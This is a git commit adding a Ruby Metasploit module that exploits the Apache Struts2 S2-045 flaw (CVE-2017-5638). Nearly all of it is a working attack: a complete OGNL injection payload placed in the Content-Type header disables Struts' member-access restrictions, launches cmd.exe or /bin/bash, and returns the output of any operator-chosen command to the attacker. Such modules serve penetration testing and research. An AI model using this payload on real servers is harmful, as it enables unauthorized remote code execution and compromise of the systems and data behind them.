struts2_s2045_rce.rb

2017-03-08 13:38:18 +08:00 · 2017-03-08 13:38:18 +08:00 · b73a884c05
parent ff8141c1b5
commit b73a884c05
1 changed files with 89 additions and 0 deletions
--- a/modules/exploits/multi/http/struts2_s2045_rce.rb
+++ b/modules/exploits/multi/http/struts2_s2045_rce.rb
@ -0,0 +1,89 @@
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+    include Msf::Exploit::Remote::HttpClient
+
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
+      'Description'    => %q{
+          It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng.
+      },
+      'Author'         => [ 'MSF Module: Chorder(http://chorder.net)'],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-5638']
+        ],
+      'Privileged'     => true,
+      'Platform'      => %w{ linux win },
+      'Arch'           => 'x86',
+      'DefaultOptions' =>{
+          'CMD' => 'whoami'
+        },
+      'Targets'        =>
+        [
+          ['Windows Universal',
+            {
+                'Arch' => ARCH_X86,
+                'Platform' => 'win',
+                'CmdStagerFlavor' => 'tftp'
+            }
+          ],
+          ['Linux Universal',
+            {
+                'Arch' => ARCH_X86,
+                'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 06 2017'))
+      
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
+          OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
+        ], self.class)
+  end
+
+
+  def execute_command(cmd, opts = {})
+    uri =   normalize_uri( datastore['URI'] )
+    headers ={
+        "Content-Type"=>"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+    }
+    data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
+    print_status("Target URI: #{uri}")
+    print_status("Attempting to execute: #{cmd}")
+
+    resp = send_request_raw({
+      'host'    => rhost,
+      'port'    => rport,
+      'uri'     => uri,
+      'version' => '1.1',
+      'method'  => 'POST',
+      'headers' => headers,
+      'data'    => data,
+    }, 5)
+    print_status( resp.body )
+  end
+
+
+
+  def exploit
+    unless datastore['CMD'].blank?
+      print_status("Executing Command...")
+      execute_command(datastore['CMD'])
+      return
+    end
+    handler
+    
+  end
+
+end